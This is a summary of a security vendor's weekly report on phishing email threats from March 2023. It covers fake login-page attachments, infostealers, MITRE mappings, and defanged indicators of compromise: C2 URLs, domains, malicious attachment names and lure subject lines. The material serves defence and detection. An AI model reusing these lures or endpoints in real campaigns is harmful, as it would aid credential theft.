ASEC analyzes phishing email threats from March 5–11, 2023, focusing on attachments and FakePage credential-theft campaigns, with a breakdown of threat types, file extensions, and distribution cases. The post also lists attacker C2 URLs, notable keywords to beware (especially PO-related phrases), and practical user defenses along with MITRE mappings. #FakePage #AgentTesla
Keypoints
- Phishing email attachments were the primary distribution method during the week analyzed.
- FakePage attachments dominated at 84% of observed threats, imitating real login pages to harvest credentials.
- Other malware types included Trojan (7%) and Infostealers (5%) such as AgentTesla and FormBook, with .NET packer VariantCrypter noted for Trojans.
- Additional categories detected: Worm (2%), Exploit (2%), and Downloader (1%).
- File extensions for attachments varied, with HTML/HTM/SHTML used for FakePages and ZIP/RAR/IMG/PDF for other malware.
- Cases included numerous FakePage subjects (e.g., DHL, FedEx, Purchase Orders) and a malware-focused case set, including many Korean-targeted instances.
- Keywords to beware emphasize “PO (Purchase Order)” as a signal to scrutinize emails and attachments.
MITRE Techniques
- [T1598] Phishing for Information – Attacker uses fake login pages to collect credentials by prompting user input. Bracket quote: ‘leading users to enter their account and password information’.
- [T1566] Phishing – Phishing emails with attachments drive initial access and credential theft; Bracket quote: ‘phishing emails covered in this post will only be those that have attachments’.
- [T1534] Internal Spearphishing – Internal spearphishing used for lateral movement as part of the phishing campaign. Bracket quote: ‘Internal Spearphishing (Lateral Movement, ID:T1534)’.
Indicators of Compromise
- [URL] context – FakePage C2 endpoints used to collect credentials and drive further actions: hxxps[:]//experiaevents[.]in/italianpay/next.php, hxxps[:]//formspree[.]io/f/xdovzjlo, and several additional domains (e.g., hxxps[:]//submit-form[.]com/OIIpXOTl) and related paths.
- [Domain] context – Example domains involved in C2: experiaevents.in, formspree.io, daca.hostedwebsitesystem.com, martinamilligan.co.business.
- [Attachment filename] context – Notable payloads in attachments: KYC_HN70(Feb15).one, greatimg.gif.scr, PO_INV 197496 .htm, DHL.zip, sex_action.jpg.scr, and multiple other named files.
- [Subject] context – Common subject patterns noted in FakePage cases: DHL | Global | express, New DHL Shipment Document Arrival Notice, Re: PO 1015_INV (Invoice Request).
Read more: https://asec.ahnlab.com/en/49839/